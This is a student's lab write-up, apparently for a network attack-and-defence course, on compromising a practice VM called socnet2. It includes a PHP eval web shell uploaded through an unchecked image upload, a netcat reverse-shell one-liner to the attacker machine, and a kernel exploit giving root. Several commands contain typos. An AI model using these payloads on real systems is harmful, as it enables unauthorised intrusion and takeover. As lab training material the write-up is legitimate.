Lab6
Network Atk&Def lab6 241840273 杨良灼
查询攻击机 IP
└─$ sudo ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::9d17:dec1:4341:a804 prefixlen 64 scopeid 0x20<link>
inet6 fd17:625c:f037:2:ea4c:bd7f:25d:cb7e prefixlen 64 scopeid 0x0<global>
ether 08:00:27:3c:97:80 txqueuelen 1000 (Ethernet)
RX packets 12 bytes 4810 (4.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 29 bytes 4353 (4.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8 bytes 480 (480.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8 bytes 480 (480.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
主机发现:得到靶机 ip 10.0.2.9.
└─$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:3c:97:80, IPv4: 10.0.2.15
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.2.1 52:54:00:12:35:00 (Unknown: locally administered)
10.0.2.2 52:54:00:12:35:00 (Unknown: locally administered)
10.0.2.3 08:00:27:55:ff:dc (Unknown)
10.0.2.9 08:00:27:e5:cd:43 (Unknown)
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.061 seconds (124.21 hosts/sec). 4 responded
端口扫描
└─$ nmap 10.0.2.9
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-17 06:00 EST
Nmap scan report for 10.0.2.9
Host is up (0.00073s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
MAC Address: 08:00:27:E5:CD:43 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.20 seconds
可以访问其 http 服务:通过浏览器访问 80 端口:10.0.2.9:80:
随便 Sign up 一个账号后 Login
First Name: John
Last Name: Smith
Nickname:
Password: 123456
Confirm Password: 123456
Email: test@abc.com
Birth Date: 1/January/1996
Gender: Male
Hometown:
Additional Informatioin
发现其可以随便发 post:
注意到 Profile 页面有 Upload Image 有文件上传漏洞,考虑使用一句话木马 + AntSword 获取 Shell:
一句话木马(torjan_251117.php5)
<?php eval($_POST['cmd']); ?>
这个文件上传甚至没有检查文件头和后缀名.
得到其文件地址:
http://10.0.2.9/data/images/posts/11.php5
然后使用 AntSword 进行连接:
然后右击,进入虚拟终端:
(*) 基础信息
当前路径:/var/www/html/data/images/profiles
磁盘列表:/
系统信息:Linux socnet2 4.15.0-38-generic #41-Ubuntu SMP Wed Oct UTC 2018 x86-64
当前用户:www-data
(*) 输入 ashelp 查看本地命令
(www-data:/var/www/html/data/images/profiles) $
查询内核版本:
(www-data:/var/www/html/data/images/profiles) $ lsb release -a
No LSB Modules are available
Distributor ID: Ubuntu
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
(www-data:/var/www/html/data/images/profiles) $
使用内核漏洞,将 linux/local/47163.c 上传至靶机的 /tmp 目录,然而我们获取的 shell 功能并不全面,反弹 shell 一下获取更完全的 shell:
(www-data:/var/www/html/data/images/profiles) $ rm /tmp/f;mkfile /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.2.15 3343 > /tmp/f
在此之前需监听我们此处指定的 3343 端口,然后直接执行:
└─$ nc -nvlp 3343
listening on [any] 3343 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.9] 42918
bash: cannot set terminal process group (1000): Inappropriate ioctl for device
bash: no job control in this shell
www-data@socnet2:/var/www/html/data/images/profiles$ python -c "import ptr;ptr.spawn('/bin/bash')"
<iles$ python -c "import ptr;ptr.spawn('/bin/bash')"
www-data@socnet2:/var/www/html/data/images/profiles$ ls
ls
1.png 2.png 3.png 11.php5 exp
www-data@socnet2:/var/www/html/data/images/profiles$ chmod +x exp
chmod +x exp
www-data@socnet2:/var/www/html/data/images/profiles$ chmod ./exp
./exp
bash-4.4# id
id
uid=0(root) gid=0(root) groups=0(root), 33(www-data)
bash-4.4# whoami
whoami
root
即成功提权为根权限.
另外这其实利用了一个靶机发布前未预料到的漏洞,实际上预想的思路应该是:
搜索框尝试 sql 注入,发现可行.
于是使用 sqlmap 注入尝试获取用户表的信息,得到密码,怀疑是 MD5 加密,暴力解码 21232f297a57a5a743894a0e4a801fc3 得到密码:
user_email: admin@localhost.com
password: admin、
通过之前上传了 monitor.py 的提示:
查看之得到一个 XML-RPC 服务,服务端口为 8000.
然后调用 CPU 指令反弹 Shell 之后利用 suid 文件逆向一下提权,但是我没搞出来.